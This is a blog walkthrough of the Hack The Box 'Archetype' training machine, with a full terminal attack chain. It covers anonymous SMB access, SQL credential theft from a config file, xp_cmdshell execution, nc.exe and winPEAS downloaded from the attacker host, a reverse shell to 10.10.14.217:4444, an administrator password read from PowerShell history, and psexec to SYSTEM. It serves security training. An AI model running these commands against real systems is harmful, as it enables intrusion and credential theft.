Top 5 This Week

Related Posts

HTB – Hack The Box – Tier 2 – Challenge 1 – Archetype

Deep Dive into HTB – Hack The Box – Tier 2 – Challenge 1 – Archetype

Part of our extensive “HTB – Hack the Box Series” – Explore the full series.

Initial Setup and Recon

First, ensure your Kali Linux is up-to-date:

sudo apt update
sudo apt full-upgrade -y

Establish a VPN connection to integrate with the HTB environment:

sudo openvpn Downloads/starting_point_UserName.ovpn

Perform reconnaissance using Nmap to identify service versions and open ports:

sudo nmap -sC -sV 10.129.110.165

Exploring SMB Shares

Analyze the SMB service for potential security lapses. Use ‘smbclient’ for share enumeration:

smbclient -N -L \\10.129.149.79\

Investigate the ‘backups’ share as it lacks administrative protection:

smbclient -N \\10.129.149.79\backups

File Analysis and Password Extraction

Retrieve sensitive configuration files from the share and extract crucial credentials:

get prod.dtsConfig

Analyze the ‘prod.dtsConfig’ file to uncover the password:

cat prod.dtsConfig

Utilizing Impacket for MSSQL Interaction

Deploy Impacket’s ‘mssqlclient.py’ for authenticated interactions with the Microsoft SQL Server:

/usr/bin/impacket-mssqlclient ARCHETYPE/[email protected] -windows-auth

Windows Command Execution via SQL Server

Exploit the ‘xp_cmdshell’ stored procedure for command execution:

xp_cmdshell "whoami"

Netcat for Shell Access

Transfer and utilize Netcat for gaining a reverse shell on the target system:

wget http://10.10.14.217/nc.exe -outfile nc.exe

Execute the binary to initiate a reverse shell:

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc.exe -e cmd.exe 10.10.14.217 4444"

Privilege Escalation with winPEAS

Download and execute winPEAS for privilege escalation opportunities:

wget http://10.10.14.217/winPEASx64.exe -outfile winpeas.exe

Run winPEAS to identify potential vulnerabilities for escalation:

.\winpeas.exe

Final Steps to System Access

Use discovered credentials for further system access and capture the user and root flags:

psexec.py [email protected]

Conclusion

This tutorial provided a technical walkthrough of the ‘Archetype’ challenge in HTB. Remember, these skills should be applied in ethical hacking scenarios to strengthen cybersecurity defenses.

Step-by-Step detailed tutorial

sudo nmap -sV 10.129.110.165
└─$ sudo nmap -sC -sV 10.129.110.165
[sudo] password for toor: 
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-05 07:23 EDT
Nmap scan report for 10.129.110.165
Host is up (0.045s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds
  • Task 1 – Which TCP port is hosting a database server? – 1433

Enumerate the Samba server shares using the “smbclient” tool. “-N” used for no password and “-L” used for identification of services running on the server

┌──(toor㉿kali)-[~]
└─$ smbclient -N -L \\\\10.129.149.79\\

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backups         Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.149.79 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

The only share that is not Admin protected is “backups”, let’s check it out.

smbclient -N \\\\10.129.149.79\\backups
┌──(toor㉿kali)-[~]
└─$ smbclient -N \\\\10.129.149.79\\backups
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 20 07:20:57 2020
  ..                                  D        0  Mon Jan 20 07:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020

                5056511 blocks of size 4096. 2544287 blocks available
smb: \> get prod.dtsConfig 
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (3.4 KiloBytes/sec) (average 3.4 KiloBytes/sec)
smb: \> exit
                                                                                                                                                 
┌──(toor㉿kali)-[~]
└─$ 

 

  • Task 2 – What is the name of the non-Administrative share available over SMB? – backups
  • Task 3 – What is the password identified in the file on the SMB share? – M3g4c0rp123
┌──(toor㉿kali)-[~]
└─$ ls    
allowed.userlist         Desktop    Downloads  Music    open.sh  Pictures        Public     three   worknotes.txt
allowed.userlist.passwd  Documents  hash       new.req  pass     prod.dtsConfig  Templates  Videos
                                                                                                                                                 
┌──(toor㉿kali)-[~]
└─$ cat prod.dtsConfig 
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>                                                                                                                                                 
┌──(toor㉿kali)-[~]
└─$ 
echo "Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc" > user.txt
  • Task 4 – What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server? – mssqlclient.py
  • https://github.com/SecureAuthCorp/impacket
  • https://www.secureauth.com/labs/open-source-tools/impacket/
┌──(toor㉿kali)-[~/archetype/impacket/impacket/examples]
└─$ sudo updatedb.plocate
                                                                                        
┌──(toor㉿kali)-[~/archetype/impacket/impacket/examples]
└─$ locate mssqlclient                               
/home/toor/archetype/impacket/examples/mssqlclient.py
/usr/bin/impacket-mssqlclient
/usr/share/doc/python3-impacket/examples/mssqlclient.py

 

/usr/bin/impacket-mssqlclient ARCHETYPE/[email protected] -windows-auth
┌──(toor㉿kali)-[~]
└─$ /usr/bin/impacket-mssqlclient ARCHETYPE/[email protected] -windows-auth
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     
SQL> enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE
SQL> xp_cmdshell "whoami"
output                                                                             

--------------------------------------------------------------------------------   

archetype\sql_svc                                                                  

NULL                                                                               

SQL> 
  • Locate the binaries for Netcat
┌──(toor㉿kali)-[~]
└─$ locate nc.exe     
/home/toor/three/SecLists/Web-Shells/FuzzDB/nc.exe
/usr/share/windows-resources/binaries/nc.exe
                                                                                    
┌──(toor㉿kali)-[~]
└─$
  • copy nc.exe to the working directory
┌──(toor㉿kali)-[~]
└─$ pwd
/home/toor
                                                                                    
┌──(toor㉿kali)-[~]
└─$ cp -p /usr/share/windows-resources/binaries/nc.exe /home/toor
                                                                                    
┌──(toor㉿kali)-[~]
└─$ ls           
allowed.userlist         Documents  nc.exe   Pictures        three
allowed.userlist.passwd  Downloads  new.req  prod.dtsConfig  user.txt
archetype                hash       open.sh  Public          Videos
Desktop                  Music      pass     Templates       worknotes.txt
                                                                                    
┌──(toor㉿kali)-[~]
└─$ 
  • run a webserver on your Kali machine serving on port 80
┌──(toor㉿kali)-[~]
└─$ sudo python3 -m http.server 80
[sudo] password for toor: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
  • find your “tun0” OpenVPN IP: 10.10.14.217
┌──(toor㉿kali)-[~]
└─$ ifconfig

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 10.10.14.217  netmask 255.255.254.0  destination 10.10.14.217
        inet6 dead:beef:2::10d7  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::e4af:3b51:736e:118a  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 1193  bytes 63637 (62.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1250  bytes 67366 (65.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

                                                                                                          
┌──(toor㉿kali)-[~]
└─$ 
  • Return to the Target machine and “wget” the “nc.exe” binary file
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.217/nc.exe -outfile nc.exe"
output
--------------------------------------------------------------------------------   
NULL                                                                               
SQL>
  • confirmation that the file was transfered can be observer in the terminal with the webserver on Kali machine
┌──(toor㉿kali)-[~]
└─$ sudo python3 -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.149.79 - - [05/Nov/2022 12:33:11] "GET /nc.exe HTTP/1.1" 200 -
  • setup a Netcat listener on the Kali machine
┌──(toor㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
  • Return to the target machine and executre a similar command to the previous one
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc.exe -e cmd.exe 10.10.14.217 4444"
  • On the Kali machine on the nc listening terminal we will have this
┌──(toor㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.217] from (UNKNOWN) [10.129.149.79] 49681
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\sql_svc\Downloads>
  • Task 5 – What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell? – xp_cmdshell
  • Task 6 – What script can be used in order to search possible paths to escalate privileges on Windows hosts? –
  • https://github.com/carlospolop/PEASS-ng.git
  • https://github.com/carlospolop/PEASS-ng/releases/tag/20221102
  • on the Kali machine download the file “winPEASx64.exe” from Releases github and place it in the working directory, and start a new webserver.
┌──(toor㉿kali)-[~]
└─$ sudo python3 -m http.server 80
[sudo] password for toor: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.149.79 - - [05/Nov/2022 13:41:55] "GET /winPEASx64.exe HTTP/1.1" 200 -
  • On the Target machine on the Powershell prompt download the winpeas file from Kali machine
PS C:\Users\sql_svc\Desktop> wget http://10.10.14.217/winPEASx64.exe -outfile winpeas.exe
wget http://10.10.14.217/winPEASx64.exe -outfile winpeas.exe
PS C:\Users\sql_svc\Desktop>
  • Run “winpeas” and check for identified files
����������͹ Found History Files
File: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
  • Task 7 – What file contains the administrator’s password? – ConsoleHost_history.txt
PS C:\Users\sql_svc\Desktop> type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
PS C:\Users\sql_svc\Desktop>
  • With the newly identified username and password we will use another tool “psexec”
┌──(toor㉿kali)-[~]
└─$ locate psexec
/home/toor/archetype/impacket/examples/psexec.py
/usr/bin/impacket-psexec
┌──(toor㉿kali)-[~]
└─$ /usr/bin/impacket-psexec [email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 10.129.149.79.....
[*] Found writable share ADMIN$
[*] Uploading file inETVhrC.exe
[*] Opening SVCManager on 10.129.149.79.....
[*] Creating service RJnn on 10.129.149.79.....
[*] Starting service RJnn.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> cd ..
 
C:\Windows> cd ..
 
C:\> cd Users
 
C:\Users> cd Administrator
 
C:\Users\Administrator> cd Desktop
 
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of C:\Users\Administrator\Desktop

07/27/2021  02:30 AM    <DIR>          .
07/27/2021  02:30 AM    <DIR>          ..
02/25/2020  07:36 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,709,221,376 bytes free

C:\Users\Administrator\Desktop> type root.txt
b91ccec3305e98240082d4474b848528
C:\Users\Administrator\Desktop> 
  • User Flag – 3e7b102e78218e935bf3f4951fec21a3
┌──(toor㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.217] from (UNKNOWN) [10.129.149.79] 49681
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\sql_svc\Downloads>cd ..
cd ..

C:\Users\sql_svc>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of C:\Users\sql_svc

01/20/2020  06:01 AM    <DIR>          .
01/20/2020  06:01 AM    <DIR>          ..
01/20/2020  06:01 AM    <DIR>          3D Objects
01/20/2020  06:01 AM    <DIR>          Contacts
01/20/2020  06:42 AM    <DIR>          Desktop
01/20/2020  06:01 AM    <DIR>          Documents
11/05/2022  09:33 AM    <DIR>          Downloads
01/20/2020  06:01 AM    <DIR>          Favorites
01/20/2020  06:01 AM    <DIR>          Links
01/20/2020  06:01 AM    <DIR>          Music
01/20/2020  06:01 AM    <DIR>          Pictures
01/20/2020  06:01 AM    <DIR>          Saved Games
01/20/2020  06:01 AM    <DIR>          Searches
01/20/2020  06:01 AM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)  10,713,702,400 bytes free

C:\Users\sql_svc>cd Desktop
cd Desktop

C:\Users\sql_svc\Desktop>dir 
dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of C:\Users\sql_svc\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:37 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,713,702,400 bytes free

C:\Users\sql_svc\Desktop>type user.txt
type user.txt
3e7b102e78218e935bf3f4951fec21a3
C:\Users\sql_svc\Desktop>
  • Root Flag: b91ccec3305e98240082d4474b848528
  • https://www.hackthebox.com/achievement/machine/303878/287
Cogeanu Marius
Cogeanu Mariushttps://cogeanu.com
Marius Cogeanu is a distinguished IT consultant and cybersecurity virtuoso based in Prague, Czechia. With a rich 20-year journey in the IT realm, Marius has carved a niche in network security and technological solutions, adeptly harmonizing tech with business requirements. His experience spans from Kyndryl to IBM, and as a valued independent consultant, where he's renowned for his innovative approaches in enhancing business operations with cutting-edge tech.Marius's forte lies in demystifying complex IT concepts, ensuring clarity and alignment for stakeholders at all levels. His commitment to staying at the forefront of industry trends and seeking innovative solutions cements his status as a go-to expert in cybersecurity. Driven by a fervent passion for technology and its potential to revolutionize businesses, Marius thrives on tackling challenging ventures, applying his prowess in network design, IT service management, and strategic planning.Currently, Marius is focused on leading-edge IT project management, infrastructure design, and fortifying cybersecurity, guiding clients through the intricate digital landscape with unmatched expertise and insight.Discover more on https://cogeanu.com

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Popular Articles